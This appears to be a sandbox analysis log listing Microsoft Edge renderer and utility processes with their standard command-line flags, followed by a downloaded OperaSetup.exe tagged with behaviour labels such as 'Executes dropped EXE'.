C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6676 /prefetch:12⤵PID:4884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6684 /prefetch:12⤵PID:5352
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6972 /prefetch:12⤵PID:5868
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7700 /prefetch:12⤵PID:2588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7704 /prefetch:12⤵PID:6320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7688 /prefetch:12⤵PID:6884
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:12⤵PID:7016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7496 /prefetch:12⤵PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8044 /prefetch:12⤵PID:6924
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8276 /prefetch:12⤵PID:6368
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8524 /prefetch:12⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8656 /prefetch:12⤵PID:4728
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8784 /prefetch:12⤵PID:7152
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9624 /prefetch:12⤵PID:7672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:12⤵PID:7848
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8540 /prefetch:12⤵PID:1156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5580 /prefetch:12⤵PID:4328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9140 /prefetch:12⤵PID:7656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10220 /prefetch:12⤵PID:7768
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9928 /prefetch:12⤵PID:7992
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9740 /prefetch:12⤵PID:7976
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10444 /prefetch:12⤵PID:696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10620 /prefetch:12⤵PID:7964
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10772 /prefetch:12⤵PID:7952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10892 /prefetch:12⤵PID:7948
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11064 /prefetch:12⤵PID:7984
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10180 /prefetch:12⤵PID:8376
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8616 /prefetch:12⤵PID:8384
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8632 /prefetch:12⤵PID:8460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11820 /prefetch:12⤵PID:8596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵PID:9156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7256 /prefetch:12⤵PID:7464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5880 /prefetch:12⤵PID:7472
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6940 /prefetch:12⤵PID:8540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=9548 /prefetch:82⤵PID:9168
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7524 /prefetch:12⤵PID:7212
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11708 /prefetch:12⤵PID:7232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7232 /prefetch:12⤵PID:8700
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9868 /prefetch:12⤵PID:8068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8744 /prefetch:12⤵PID:8380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:12⤵PID:8792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9668 /prefetch:12⤵PID:2360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9660 /prefetch:12⤵PID:7608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9648 /prefetch:12⤵PID:7304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10284 /prefetch:12⤵PID:7356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:12⤵PID:8360
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11872 /prefetch:12⤵PID:7668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11904 /prefetch:12⤵PID:7268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6696 /prefetch:12⤵PID:2380
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11188 /prefetch:12⤵PID:1320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10428 /prefetch:12⤵PID:4540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9552 /prefetch:12⤵PID:2260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11612 /prefetch:12⤵PID:9104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11304 /prefetch:12⤵PID:1812
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8168 /prefetch:12⤵PID:8680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:12⤵PID:7664
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:12⤵PID:7660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12044 /prefetch:12⤵PID:7512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9292 /prefetch:12⤵PID:7752
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11072 /prefetch:12⤵PID:8628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9636 /prefetch:12⤵PID:6044
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8652 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9368 /prefetch:12⤵PID:5256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3736 /prefetch:12⤵PID:5164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10664 /prefetch:12⤵PID:7468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9572 /prefetch:82⤵PID:7256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=8676 /prefetch:82⤵PID:5428
-
-
C:\Users\Admin\Downloads\OperaSetup.exe"C:\Users\Admin\Downloads\OperaSetup.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8052 -
